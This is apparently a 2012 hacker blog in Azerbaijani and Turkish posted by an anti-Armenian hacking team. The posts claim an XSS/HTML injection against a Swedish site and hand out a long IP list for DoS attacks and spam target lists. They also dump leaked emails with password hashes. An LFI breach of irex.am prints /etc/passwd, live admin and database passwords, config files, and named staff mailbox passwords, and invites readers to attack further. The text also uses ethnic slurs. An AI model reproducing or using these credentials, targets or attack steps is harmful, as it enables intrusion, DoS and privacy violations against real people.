29 Ekim 2012 Pazartesi

TMR XSS + HTML Injection

+-------------------------------------------+ Title : TMR XSS + HTML Injection Target site : http://timra.se/ Vuln Type : Hyper Text Markup Language Injection Author : Avatar Fearless Info (i) ~~~~~~ Header's : HTTP/1.1 200 OK => Cache-Control => private Content-Type => text/html; charset=utf-8 Expires => Thu, 11 Oct 2012 16:15:34 GMT Server => Microsoft-IIS/7.5 Set-Cookie => ASP.NET_SessionId=aulv0q5u52murewpydzjbjc2; path=/; HttpOnly X-AspNet-Version => 4.0.30319 X-Powered-By => ASP.NET Date => Fri, 12 Oct 2012 16:15:34 GMT Connection => close Content-Length => 19669 Tested on : WIndows 7 Professional x86 Analytics : Google Analytics [# Website Pageviews 1 www.google.com 32,074 2 stackoverflow.com 25,706 3 www.reddit.com 22,825] System : ~jQuery(Javascript Framework) ~IIS (Web Server) ~Microsoft ASP.NET(Web Framework) ~Windows Server(Operating System) +-------------------------------------------+ Vulnerability on : Search System(Search Plugin/widget) +------------------!Using HTML injection!------------------+ Taget : www.timra.se Searching something easy(ex: asd) : http://timra.se/sok/?query=asd Using

HTML tag`s : http://timra.se/sok/ It parse in URL & take in input. But it not parse in search textbox & it take in input. http://imageshack.us/scaled/landing/28/tmrw.png +------------------!Using Cross Site Scripting{XSS}!------------------+ Target : www.timra.se Searching Something easy[again ;P](ex: asd) : http://timra.se/sok/?query=asd Using most usually JS(Javascript) tag : http://timra.se/sok/ It parse in URL & take in input. But it not parse in search textbox & it take in input. http://imageshack.us/scaled/landing/21/tmr2.png Bonus Proof : http://youtu.be/qJo-daSAXnY SHOUT`ZZZ & RESPECT TO : Anti-armenia.ORG (AA - Anti-armenia Team) All My Bro'S & ESPECIALLY : AkaStep , MetaizM , Ferid23 , BOT_25 , Leroy , AzSecurity All Anti-armenia Team member's!!! +-------------------------------------------+

Gönderen zaman: Hiç yorum yok:

+622 IP / MAC address

Buyurun MAC + İP address-ləri dünyanin 4 1 yerindən. 5K , DoS attack filan İP-ləri çökürdün +------------------------+ 192.168.0.11:33840 1.187.24.70:63996 31.8.32.166:41402 31.162.94.155:30070 31.180.232.118:34882 37.45.130.139:12187 46.130.12.96:35689 46.241.146.173:6881 46.241.163.28:6881 78.184.78.3:65435 83.255.106.90:33840 85.26.235.52:6881 91.240.120.2:41497 95.79.222.2:23220 109.87.6.97:30915 109.97.190.35:15301 178.123.93.254:31668 178.123.176.155:30575 178.151.185.52:39776 182.178.124.80:46729 188.64.15.198:63403 223.205.138.140:21824 217.150.40.189:36385 217.115.188.227:28498 213.141.154.241:23910 213.87.132.249:56557 212.109.28.237:60393 212.87.191.235:14547 195.182.194.214:31020 195.62.62.246:37291 195.58.249.218:6737 195.2.233.234:21783 193.239.75.123:55297 188.232.156.5:13604 188.168.97.126:56601 188.162.132.19:11676 188.134.115.232:57578 188.134.41.225:35691 188.130.240.41:1348 188.114.37.111:35691 188.44.108.7:29507 188.32.172.245:35778 188.19.175.187:25358 188.18.50.128:27020 188.17.249.89:53109 186.214.182.224:17303 178.216.122.247:46995 178.215.108.103:14659 178.212.92.131:60512 178.207.16.251:65535 178.187.203.107:61065 178.187.93.58:45500 178.169.93.243:13294 178.137.118.195:32927 178.127.49.55:30791 178.125.239.76:58722 178.123.70.229:63128 178.94.13.148:40024 178.93.91.108:21647 178.89.137.59:61633 178.89.37.232:14657 178.76.219.243:1946 178.76.214.239:19294 178.75.109.67:17562 178.66.50.93:36390 178.64.34.22:53336 178.35.233.139:39170 178.35.218.165:21204 176.214.153.6:22876 176.209.203.48:26878 176.195.85.61:35634 176.120.105.176:20354 176.117.254.3:29786 176.112.96.5:7256 176.100.218.204:33494 176.100.66.28:49643 176.36.196.29:63245 176.15.233.254:44207 176.15.229.54:55485 176.14.55.138:64338 176.8.87.50:61391 117.2.167.47:28452 109.226.89.101:29877 109.207.118.65:35691 109.187.212.143:35691 109.187.60.101:28280 109.185.223.174:12470 109.185.205.61:12740 109.184.78.220:28058 109.184.39.112:20902 109.172.31.222:29317 109.111.81.228:61158 95.191.2.40:61432 95.188.117.8:37759 95.182.110.206:62036 95.161.252.91:64718 95.134.153.161:16420 95.129.140.246:32414 95.105.24.137:20286 95.83.128.79:64440 95.83.121.84:44744 95.79.45.187:34453 95.76.34.95:29051 95.73.48.225:23623 95.73.32.135:31640 95.71.27.101:61384 95.58.61.40:20759 95.57.200.234:29000 95.57.104.6:35691 95.56.144.243:53279 95.27.142.60:15365 95.26.148.124:31103 95.24.203.135:11701 95.8.147.164:24340 94.232.233.220:25756 94.231.178.30:29529 94.181.216.191:23470 94.179.57.45:12322 94.178.46.94:29691 94.77.167.31:52706 94.77.141.101:37046 94.52.147.79:15701 93.187.182.40:19014 93.178.75.162:51567 93.94.178.240:59469 93.81.159.151:35691 93.72.215.55:35691 92.248.170.68:26155 92.246.223.243:62882 92.242.96.126:62124 92.55.37.254:42686 92.46.211.155:39453 91.234.0.110:61851 91.226.164.51:36646 91.220.92.10:55186 91.209.51.154:49296 91.209.51.56:22345 91.197.207.203:25911 91.124.133.31:27402 91.124.21.76:49803 89.254.233.95:14823 89.252.98.7:5839 89.189.191.19:35326 89.113.25.234:52880 89.109.238.93:36392 89.28.39.147:63203 88.192.94.236:35202 85.174.167.120:64807 85.174.160.35:35691 85.93.57.113:1089 85.93.57.109:11828 84.21.73.165:50714 84.0.206.180:36307 81.163.64.68:53696 81.30.60.17:16153 80.252.247.8:31927 80.93.126.114:35691 80.69.56.123:58139 79.173.80.75:16611 79.170.141.183:20762 79.165.28.246:21746 79.117.99.217:17462 78.61.194.163:25042 78.26.128.204:33260 77.232.142.2:30487 77.121.38.170:45888 77.120.23.92:20301 77.109.9.18:22068 77.106.107.245:40193 77.93.59.157:35691 62.220.35.200:23061 62.196.64.7:13053 62.163.132.251:63222 46.200.206.65:11315 46.200.102.226:53979 46.190.16.244:47343 46.180.206.102:31346 46.175.192.128:44298 46.175.36.184:16180 46.159.212.79:63168 46.119.182.48:6881 46.98.194.60:28633 46.98.48.203:37517 46.98.42.23:50070 46.70.54.167:10032 46.70.25.210:34288 46.63.128.138:24819 46.46.49.223:13086 37.139.110.124:11886 37.113.95.236:41105 37.99.11.167:21320 37.72.78.39:35691 37.58.36.225:62899 37.53.234.89:22734 37.1.3.28:58454 31.202.194.216:24894 31.8.138.7:18079 5.166.72.249:12282 2.95.120.229:63913 2.94.129.223:27094 2.61.60.55:52880 109.194.187.60:25966 194.176.195.145:50059 89.113.25.195:43715 194.178.125.195:44876 194.176.14.55:49802 194.176.120.105:49840 37.58.36.195:41411 46.194.175.36:49848 194.178.127.49:14200 2.95.120.195:42435 92.46.195.147:49819 194.176.36.26:21698 194.188.18.50:49792 89.195.188.98:1814 109.195.162.89:25972 194.176.36.195:33821 89.28.39.194:37827 194.188.19.194:44994 194.178.195.143:20001 95.27.194.142:15420 89.195.159.60:50100 78.85.17.195:36677 2.94.194.153:26306 194.188.44.108:1907 194.128.71.195:38594 37.195.165.13:50093 37.195.140.46:12482 194.178.194.187:23747 80.195.188.195:46856 194.176.195.132:5314 37.99.11.194:42835 194.178.91.195:36677 194.178.126.194:40509 46.33.56.6:21032 95.194.137.195:40551 46.194.130.12:24770 94.77.194.167:8131 109.195.143.118:16834 194.178.194.137:30403 194.178.123.62:50101 194.178.123.93:50110 37.45.194.130:49803 95.79.195.158:602 [2002:55ae:a023::55ae:a023]:35691 [2001:0:5ef5:73b8:1097:c25:b05a:e309]:21746 [2a02:2f02:3021:f008::4f75:63d9]:17462 61.27.192.42:51515 200.66.37.248:16335 122.217.30.147:20853 114.32.22.55:21881 221.255.194.249:10412 46.55.7.251:56799 93.72.24.185:35691 218.228.204.30:13193 79.124.32.3:16497 202.101.245.168:8975 92.124.36.203:27733 112.119.166.82:9313 119.106.215.84:22029 88.204.21.33:33000 119.172.15.156:12831 61.221.166.8:8151 111.100.115.210:10206 114.69.47.156:17279 [2002:25c:e7e5::25c:e7e5]:11015 [2001:0:5ef5:73b8:c2f:c42f:9244:3e34]:36065 [2001:0:5ef5:79fd:9e:fb71:aae5:14cb]:6881 [2001:0:9d38:953c:865:ab:378f:10ee]:15064 200.112.239.17:15064 178.94.52.18:63644 213.87.240.141:35713 95.73.127.209:40356 61.93.82.6:9124 85.239.128.44:14390 176.14.246.49:8080 93.114.210.127:11590 123.202.225.167:16070 176.196.20.133:12664 31.130.194.17:6881 201.58.221.69:8080 27.41.201.253:23076 221.160.228.15:10071 178.74.78.79:35995 116.64.80.158:23659 220.135.123.26:19770 2.134.209.74:29778 128.71.214.176:41653 62.133.184.237:52690 14.198.35.59:7286 95.64.202.249:13406 123.204.86.129:17737 178.141.32.88:62852 95.110.100.193:32524 79.112.79.94:44471 213.167.220.87:63667 176.97.193.3:49094 178.123.245.84:30575 217.30.202.14:23359 118.144.78.13:25988 128.73.187.167:35691 220.132.78.145:10622 83.139.183.254:44437 111.100.65.133:8372 220.133.118.188:15804 109.165.116.143:36200 92.244.248.183:22510 178.125.67.171:58722 [2001:0:5ef5:79fd:38a6:99b:9246:32c2]:12740 5.167.175.251:12282 37.54.54.79:40356 37.229.13.237:44949 46.55.7.129:42320 46.116.103.228:17648 62.183.85.226:47971 77.105.61.233:20019 78.36.243.143:14791 83.142.111.197:38458 85.95.162.116:58853 85.173.145.110:43542 86.62.109.129:63982 87.244.198.25:44319 91.205.236.230:14399 91.211.213.14:24818 92.46.65.13:50833 92.127.68.85:59342 92.252.178.179:52960 94.143.40.37:2844 94.181.195.145:39015 94.232.73.67:25749 95.53.56.103:12860 95.190.102.157:12744 109.205.253.148:43845 176.14.227.181:14243 176.65.109.196:57237 178.46.201.100:20626 178.75.124.41:19776 178.122.242.205:29422 178.204.219.140:62770 182.185.140.100:63517 188.162.132.76:25946 188.241.234.177:46761 194.8.235.253:64548 85.15.99.72:18252 178.150.95.165:35691 37.112.78.181:63172 78.85.17.207:17812 37.1.4.219:13496 77.91.198.119:59600 193.33.88.6:47386 78.63.43.133:30753 217.118.79.24:61174 46.63.162.74:35691 78.139.70.15:17664 92.101.91.46:42910 86.106.243.213:10813 78.62.67.190:57771 109.106.192.142:11399 31.8.165.24:12843 193.30.164.9:42305 178.46.209.188:41304 178.67.193.162:46375 46.55.72.215:21515 94.75.15.38:13899 79.111.95.143:52695 91.226.138.4:35691 91.203.168.230:53629 109.187.131.80:21513 92.81.157.178:59165 178.129.137.245:45385 78.60.178.133:24435 117.198.35.166:36202 93.124.33.50:11931 93.115.61.54:52528 31.180.196.251:38615 212.74.223.1:56939 80.72.226.150:36385 46.98.1.8:50070 94.180.0.176:38481 128.75.219.102:56995 62.212.200.112:57771 195.144.14.78:30111 81.88.222.83:30705 95.53.87.29:28605 182.186.83.46:51523 93.159.243.23:42580 94.233.140.107:32098 213.154.13.139:35691 [2002:b259:893b::b259:893b]:61633 140.115.49.32:27600 110.164.254.82:16883 111.110.138.143:7647 183.203.10.145:8939 78.83.27.2:16116 220.134.193.252:9098 58.177.127.212:21847 221.133.119.137:18730 183.203.11.199:8934 124.244.245.112:9402 221.242.9.27:10707 122.143.1.40:8284 111.250.119.218:14458 61.49.29.118:26136 202.171.254.14:16881 14.198.121.41:27299 82.199.102.184:20207 [2002:1fa2:5e9b::1fa2:5e9b]:30070 117.200.116.202:26961 [2001:0:4137:9e76:3c32:468:4da6:76c4]:61633 [2001:0:5ef5:79fd:24cb:1e63:268c:431c]:28498 [2002:b064:421c::b064:421c]:49643 [2001:0:5ef5:79fd:3c37:2722:4ff1:c875]:64338 [2002:6de2:5965::6de2:5965]:29877 [2002:5c2e:d39b::5c2e:d39b]:39453 [2001:0:9d38:6ab8:20e8:13b6:a3d1:2c64]:0 217.118.78.43:45764 [2001:0:5ef5:79fb:38ed:6ac:921d:a69a]:0 37.45.118.140:12187 [2001:0:5ef5:79fd:1c82:1ff6:af03:8f7]:31927 61.57.121.209:26132 59.189.196.202:18123 77.67.84.204:16883 119.246.152.122:24826 122.116.189.124:8888 113.253.44.253:9977 218.187.244.170:12312 71.183.145.99:10059 126.115.39.43:18676 61.57.131.64:27740 119.247.115.250:12647 58.176.56.151:8888 27.44.253.229:8080 213.231.168.213:18529 123.194.119.171:21588 78.90.191.138:14889 125.203.247.185:13011 117.108.48.142:12628 89.248.80.14:6824 203.73.48.65:65532 120.50.236.110:11140 111.98.218.78:14332 221.187.129.138:17592 [2002:b297:b934::b297:b934]:39776 91.218.38.132:2710 218.40.129.124:15996 203.222.213.60:17577 113.155.110.68:12919 95.87.196.55:10572 190.189.56.244:11111 114.35.156.74:20174 79.123.166.131:55555 218.212.216.112:16106 220.219.96.76:25476 84.26.10.88:7169 [2002:b27b:5dfe::b27b:5dfe]:31668 [fe80::742e:23a0:6584:4c26]:62882 [2002:5f69:1889::5f69:1889]:20286 [2002:5eb5:d8bf::5eb5:d8bf]:23470 [2002:2ef1:a31c::2ef1:a31c]:6881 89.204.66.135:21975 60.189.252.49:8080 222.164.28.146:12512 74.77.235.159:15423 203.116.228.202:12495 115.163.194.104:24323 85.194.174.124:3128 91.140.54.246:47343 [fe80::ffff:ffff:fffe]:47343 59.124.90.24:15210 119.175.194.154:17600 106.187.56.68:12345 50.70.70.40:17835 27.141.147.217:9360 175.132.92.179:9985 114.33.162.9:8727 84.43.152.221:17499 118.233.235.224:9106 110.164.254.38:16881 116.64.108.207:26883 60.248.227.73:14638 82.27.172.91:9246 211.124.129.155:6881 81.236.8.231:27385 58.177.5.113:8780 180.218.114.19:18462 212.64.43.5:17844 188.133.241.56:42250 123.0.120.14:11993 60.210.176.171:18001 113.151.240.149:12768 58.188.109.205:23276 218.28.140.75:27356 114.40.253.156:20367 219.96.35.171:9081 59.138.163.146:7104 2.92.231.229:11015 [2001:0:5ef5:73b8:c0c:c8a:e04b:1789]:34882 [2001:0:4137:9e76:2091:306e:b147:b1fc]:65435 [2001:0:5ef5:79fb:20e0:ce2:e05d:a164]:30070 88.175.153.86:9850 76.122.127.181:18340 77.77.10.45:15814 114.35.233.193:20409 220.132.121.75:15696 58.177.38.27:17122 109.201.254.92:23149 175.180.131.27:20301 126.25.95.250:18801 93.123.108.29:14512 119.14.31.5:25088 175.180.160.199:17324 82.243.79.150:26415 77.40.84.176:32358 71.227.127.97:20817 61.157.232.185:8998 77.230.37.24:18931 113.255.196.87:22529 116.83.74.252:23513 218.228.196.19:15750 118.232.215.55:62119 116.113.44.156:14785 114.42.205.226:26180 221.223.58.227:8888 219.110.36.29:24914 220.249.94.138:8356 175.143.91.58:16746 61.4.27.64:11825 86.21.93.192:12780 78.113.68.11:18331 80.85.23.246:56370 126.9.230.69:16827 [2002:5e34:934f::5e34:934f]:15701 [2001:0:5ef5:79fd:348a:2040:a309:200c]:0 [2002:1bb:1846::1bb:1846]:63996 31.8.108.122:24478 60.189.62.247:8080 121.7.146.7:8080 84.123.176.223:8080 [2001:0:5ef5:79fd:1410:b5d:4f9b:bde3]:0 [2001:0:5ef5:79fb:24fe:1a04:a1b2:58e0]:52706 [2001:0:5ef5:79fd:451:209f:a6e3:d86c]:63203 [2001:0:5ef5:79fd:4d9:1013:a73f:a113]:35202 [fe80::d0fd:237d:782:28a9]:62899 [2002:2e37:781::2e37:781]:42320 61.91.88.16:16883 109.229.138.120:22836 24.58.160.159:6882 219.99.74.146:51847 175.132.185.52:25848 92.115.181.6:50000 186.220.194.18:20192 27.141.213.53:21923 14.198.153.204:21025 210.128.78.38:9874 61.120.134.17:14335 113.151.184.110:19561 175.135.41.247:55555 89.163.36.232:8080 94.212.219.233:26980 212.231.206.149:18437 77.93.20.118:8537 183.178.255.151:9033 203.76.81.209:7811 193.19.228.108:18273 126.54.116.66:14000 121.110.12.131:15103 202.156.56.239:17700 80.54.233.47:12431 217.109.136.13:8080 221.16.32.31:13974 124.11.138.40:11964 123.203.153.162:10390 78.90.252.72:7191 88.124.177.9:14348 213.111.203.112:51441 77.70.89.168:13384 121.107.159.135:20745 221.181.76.148:7355 113.150.111.252:7453 113.157.175.253:11830 118.212.184.15:8842 212.45.82.190:24208 46.129.71.59:7422 120.74.203.192:11146 183.203.10.177:8904 [2001:0:5ef5:79fb:3cd8:188a:ac00:95a5]:33840 78.154.170.146:63159 79.176.19.212:8080 91.117.95.93:8080 71.75.239.9:9497 182.50.165.127:19112 125.54.195.108:15184 108.46.74.203:16232 195.128.101.140:6880 89.31.112.91:44100 [2001:0:5ef5:79fd:28ed:17dd:4f8a:1fc]:29786 77.225.140.56:15042 220.132.246.220:26836 113.159.54.9:8437 180.26.113.253:15472 121.108.27.208:20761 59.120.17.94:16222 220.135.51.228:60423 121.107.194.32:11734 220.133.47.212:8818 188.254.214.97:19666 125.2.109.145:50000 87.13.56.14:33373 95.96.34.14:12055 210.6.191.121:21107 122.116.62.87:12911 84.40.86.128:24681 219.233.249.245:26541 114.34.127.43:20852 101.50.150.114:27478 222.134.85.169:8888 183.203.11.140:8941 101.111.215.125:17744 114.33.249.55:20174 124.144.242.130:7203 [2001:0:5ef5:79fb:d1:2a8b:aee1:c3ee]:0 [2001:0:5ef5:79fb:2063:20e7:d1d1:ce20]:0 +------------------------+
Gönderen zaman: Hiç yorum yok:

arm - rus ips + Spam Mail's

Buyurun sizlərə rus + erm*** ip-ləri verirəm + spam üçün maillər. İP-lər : http://pastebin.com/PXXajWvS Spam üçün Maillər(Special Edition) : http://thefear.in/spam.html Girin s*kin bunların var yoxun!
Gönderen zaman: Hiç yorum yok:

8 Eylül 2012 Cumartesi

≈ 40 arm b*tches mail + ip + pass

≈ 40 arm b*tches mail + ip + pass : Kod: password email last_ip f802e11de504da5f1642382198bfb64b harut@tvarm.ru 10.0.0.42 d4d7a9b28e56736bd7832b2efba97ea2 inna19-87@mail.ru 10.0.0.112 519d10b983f119e48b0e8dd998989079 ann@tvarm.ru 10.0.0.69 fbab65eb58e106254c7fa618d8a34b08 harutx@rambler.ru 10.0.0.42 72b7e1266271a0b44aa40858087c7261 k1.armen@rambler.ru 10.0.0.141 cde2e09a08d95a4a9c04921603b084bf shagen_n@yahoo.com 31.192.105.96 632d485c14054cfa401d44c6e8db04eb mariam@tvarm.ru 10.0.0.55 a3999f4a946cc2ac3032c483ced07d92 dp@tvarm.ru 10.0.0.21 96a210906627c9942ce1deb394ad4a65 kazaryan@tvarm.ru 10.0.0.174 435719ab9b0f9e913cc4f3bab14c1624 netgate@web12.ru 95.27.123.243 5bb6959c0a56c6fb82ad3969582aeee3 tvtatev@gmail.com 93.91.2.161 b2776df52f1c8370a68a6ad2a32f9b83 soulange-lucy@yandex.ru 4 6.158.202.81 9eb2df2911343a0a9b0bbf1583308d92 ya.vzakone2012@yandex.ru 77.51.11.207 a43f4be8ae9a4f562b0b686f4ed9a91a marina.saakyan.1994@mail.ru 92.36.82.115 b924ae77521cfb963f219f5d04efd1c7 biorezonans@mail.ru 94.188.45.196 ab331ca5487e3669ddb79c10cacadd0c garri.bagramjan@vipmail.hu 89.132.165.132 d968d934c5e7c19426c06153947f4daa petrovka-r2@bk.ru 77.91.198.75 d54b9a21cf4932476b9201ed734b730f alux_kiz_6411@mail.ru 89.178.148.160 4d795f38ff1a14a7e4fabe779a00141a tatyana_manoyan@mail.ru 83.220.162.22 81ed4bcb0d1428c46bee577ffc55c849 tvtvtv@bk.ru 95.71.70.225 930f580dbc3d2db92f42c9fe313d2a45 ivontar@gmail.com 193.110.115.253 7f1c400c82c2ca91595ef96064d7f2ad shagen_n@list.ru 31.192.105.96 0f5aaaf14d9a2d371853e46119abba27 gn0mir@mail.ru 46.211.38.133 8bc3035405dfe56e89ff32e4c5521602 keti-h@ya.ru 217.174.184.138 71084f0b54ca16fc66eca81a0c954688 arevik.takmozyan.89@mail.ru 85.26.186.125 18625d69ba223725a59a50a810f2fa90 likagordasky@gmail.com 92.113.178.215 af95788e7885aaf0d13689d2bf737848 katja2602@mail.ru 85.26.235.144 29971accae10ae9460cfe00593928fbc iren.leto@mail.ru 85.26.184.195 f63f4fbc9f8c85d409f2f59f2b9e12d5 butovatona@mail.ru 95.31.24.200 1a74212caa681de89f695a28eae84221 marina.saakyan.1994@mail.ru 92.36.28.93 f63f4fbc9f8c85d409f2f59f2b9e12d5 artovaira@mail.ru null f63f4fbc9f8c85d409f2f59f2b9e12d5 kotovalarissa@mail.ru null 70a109bc00bdd6298a73d4b1ad74d0c6 kris-iris90@mail.ru 109.168.198.16 f63f4fbc9f8c85d409f2f59f2b9e12d5 bakeevanina@mail.ru null cbb62e35aec62c2509ff9b0e711332b7 fgrt4@rambler.ru 46.39.224.129 62d4b7788eda719c0039adbd84324b90 tatevik161994@mail.ru 95.153.167.251 ce780b611444df60fb0461de0a05150d shagen_tv@yahoo.com 31.192.105.98 d1ad8cc8f773fba507a25b44a5e3ef9f Lerno@List.ru 178.93.61.112 af0d4985e236d894c3e1462ea112d4f7 boss.shagen@mail.ru 178.72.137.110 75a72997356b70572e36666def48b493 e9@buyandsmoke.net null 75a72997356b70572e36666def48b493 e12@buyandsmoke.net 37.1.200.121 P.S : http://pastebin.com/vJ8zrQvD
Gönderen zaman: Hiç yorum yok:

Irex.am[iw] Pwned

Salamlar Hamıya. Bu Gün sizlərə irex.am phpmyadmin bilgiləriə + əlavə maillər falan verəcəm. Nə Shell uplaya bildim nədə meta ata bildim. bu site MySQL-ə qoşulmayıb :/ Hamıya Uğurlar. Girin nə ata bilirsiz atın =) http://pastebin.com/EqHbXd9t Kod: /* Avatar Fearless Special Thank`Z to : BOT_25 Special Respect To : Leroy , MetaizM , AkaStep , MCH , XEY , BOT_25 , System_Invisible , Ferid23 , AzSecurity and All Bro*s And AlL Anti-armenia Team! And Specially Matador! */ http://www.irex.am/ IREX.AM pwned Kod: +-------------Attack Type : LFI(Local File Inclusion)-------------+ ~~~~~~~~~~~~~CAT /ETC/PASSWD (Files)~~~~~~~~~~~~~ # $FreeBSD: src/etc/master.passwd,v 1.40.18.1 2008/11/25 02:59:29 kensmith Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin sevachh:*:1001:1001:Sevak Harutyunyan:/home/sevachh:/bin/sh mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin courier:*:465:465:Courier Mail System:/var/spool/courier:/sbin/nologin postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin virtual:*:1981:1981:User &:/home/virtual:/sbin/nologin webmaster:*:1982:1982:Lusine:/usr/local/www/data/irex.am:/bin/true vacation:*:65501:65501:Vacation:nonexistent:/usr/sbin/nologin ~~~~~~~~~~~~~Path Disclosure : Local Path~~~~~~~~~~~~~ /usr/local/www/data-dist/irex.am/news/ ------------------------------------------------------ FCK Editor Login : Parol EPDIREX:tBptk/iyOATXI get parolu qir irex.am/editor ------------------------------------------------------ PostFixAdmin : phpmyadmin.irex.am Login : postfixadmin Parol : irexvh777 ------------------------------------------------------- Kod: // // Postfix Admin // by Mischa Peters // Copyright (c) 2002 - 2005 High5! // License Info: http://www.postfixadmin.com/?file=LICENSE.TXT // // File: config.inc.php // if (ereg ("config.inc.php", $_SERVER['PHP_SELF'])) { header ("Location: login.php"); exit; } // Postfix Admin Path // Set the location to your Postfix Admin installation here. $CONF['postfix_admin_url'] = 'http://postfix-admin.irex.am/'; $CONF['postfix_admin_path'] = '/usr/local/www/postfixadmin/'; $CONF['default_language'] = 'en'; // Database Config // mysql = MySQL 3.23 and 4.0 // mysqli = MySQL 4.1 // pgsql = PostgreSQL $CONF['database_type'] = 'mysql'; $CONF['database_host'] = 'localhost'; $CONF['database_user'] = 'postfixadmin'; $CONF['database_password'] = 'irexvh777'; $CONF['database_name'] = 'postfix'; $CONF['database_prefix'] = ''; $CONF['admin@irex.am'] = '<>'; $CONF['smtp_server'] = 'localhost'; $CONF['smtp_port'] = '25'; $CONF['encrypt'] = 'cleartext'; $CONF['generate_password'] = 'NO'; $CONF['page_size'] = '20'; $CONF['default_aliases'] = array ( 'webmaster' => 'webmaster@irex.am' ); $CONF['domain_path'] = 'YES'; $CONF['domain_in_mailbox'] = 'YES'; $CONF['aliases'] = '10'; $CONF['mailboxes'] = '50'; $CONF['maxquota'] = '0'; $CONF['quota'] = 'YES'; $CONF['quota_multiplier'] = '1024000'; $CONF['transport'] = 'YES'; $CONF['vacation'] = 'YES'; $CONF['vacation_domain'] = 'autoreply.irex.am'; $CONF['vacation_control'] = 'YES'; $CONF['vacation_control_admin'] = 'YES'; $CONF['alias_control'] = 'NO'; $CONF['special_alias_control'] = 'NO'; $CONF['logging'] = 'YES'; $CONF['show_header_text'] = 'NO'; $CONF['header_text'] = ':: Postfix Admin ::'; $CONF['show_footer_text'] = 'YES'; $CONF['footer_text'] = '' ; $CONF['footer_link'] = 'http://www.irex.am/'; $CONF['welcome_text'] = < phpMyAdmin "Admin" Case : phpmyadmin.irex.am login : root password : irexvh777 Kod: ------------------------------------------------------- /* $Id: config.sample.inc.php,v 2.1.2.2 2006/08/28 08:14:14 nijel Exp $ */ // vim: expandtab sw=4 ts=4 sts=4: /** * phpMyAdmin sample configuration, you can use it as base for * manual configuration. For easier setup you can use scripts/setup.php * * All directives are explained in Documentation.html and on phpMyAdmin * wiki . */ /* * This is needed for cookie based authentication to encrypt password in * cookie */ $cfg['blowfish_secret'] = 'tcp'; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */ /* * Servers configuration */ $i = 0; /* * First server */ $i++; /* Authentication type */ $cfg['Servers'][$i]['auth_type'] = 'cookie'; /* Server parameters */ $cfg['Servers'][$i]['host'] = 'localhost'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; /* Select mysqli if your server has it */ $cfg['Servers'][$i]['extension'] = 'mysql'; /* User for advanced features */ $cfg['Servers'][$i]['controluser'] = 'root'; $cfg['Servers'][$i]['controlpass'] = 'irexvh777'; /* Advanced phpMyAdmin features */ $cfg['Servers'][$i]['pmadb'] = 'phpmyadmin'; $cfg['Servers'][$i]['bookmarktable'] = 'pma_bookmark'; $cfg['Servers'][$i]['relation'] = 'pma_relation'; $cfg['Servers'][$i]['table_info'] = 'pma_table_info'; $cfg['Servers'][$i]['table_coords'] = 'pma_table_coords'; $cfg['Servers'][$i]['pdf_pages'] = 'pma_pdf_pages'; $cfg['Servers'][$i]['column_info'] = 'pma_column_info'; $cfg['Servers'][$i]['history'] = 'pma_history'; /* * End of servers configuration */ /* * Directories for saving/loading files from server */ $cfg['UploadDir'] = ''; $cfg['SaveDir'] = ''; ?> Extra Mail's : Kod: username password name maildir quota domain created modified active Düzenle Sil lilit@irex.am vlilit09 Lilit Voskanyan irex.am/lilit@irex.am/ 2097152000 irex.am 2008-12-26 03:46:29 2011-11-15 09:14:32 1 Düzenle Sil armine@irex.am arminqw12 Armine Sahakyan irex.am/armine@irex.am/ 2097152000 irex.am 2010-09-02 04:48:43 2010-09-02 04:48:43 1 Düzenle Sil anarine@irex.am nano Narine Ayvazyan irex.am/anarine@irex.am/ 2147483647 irex.am 2008-12-29 01:14:49 2010-06-09 07:06:02 1 Düzenle Sil ugrad@irex.am MUSIK&*( Global Ugrad irex.am/ugrad@irex.am/ 256000000 irex.am 2010-02-08 06:35:35 2011-09-26 12:08:00 1 Düzenle Sil shushanik@irex.am shushik Shushanik Karpetyan irex.am/shushanik@irex.am/ 2097152000 irex.am 2009-09-10 10:53:10 2009-09-14 15:18:03 1 Düzenle Sil zhaneta@irex.am s@s3d! Zhaneta Khachatryan irex.am/zhaneta@irex.am/ 2147483647 irex.am 2008-12-29 01:23:48 2011-04-21 10:31:41 1 Düzenle Sil arina@irex.am xhbNHkCvM Arina Zohrabian irex.am/arina@irex.am/ 2147483647 irex.am 2008-12-29 01:26:15 2010-12-16 21:13:21 1 Düzenle Sil muskie@irex.am MUSIK&*( MUSKIE irex.am/muskie@irex.am/ 262144000 irex.am 2010-12-20 10:25:48 2011-09-26 12:06:56 1 Düzenle Sil reception@irex.am lilit IREX RECEPTION irex.am/reception@irex.am/ 262144000 irex.am 2010-08-27 08:39:24 2011-08-02 04:34:25 1 Düzenle Sil ariadna@irex.am Dionis1986 Ariadna Grigoryan irex.am/ariadna@irex.am/ 2097152000 irex.am 2009-12-03 10:39:48 2010-03-12 10:08:40 1 Düzenle Sil marinag@irex.am hellomarina Marina Gevorgyan irex.am/marinag@irex.am/ 2097152000 irex.am 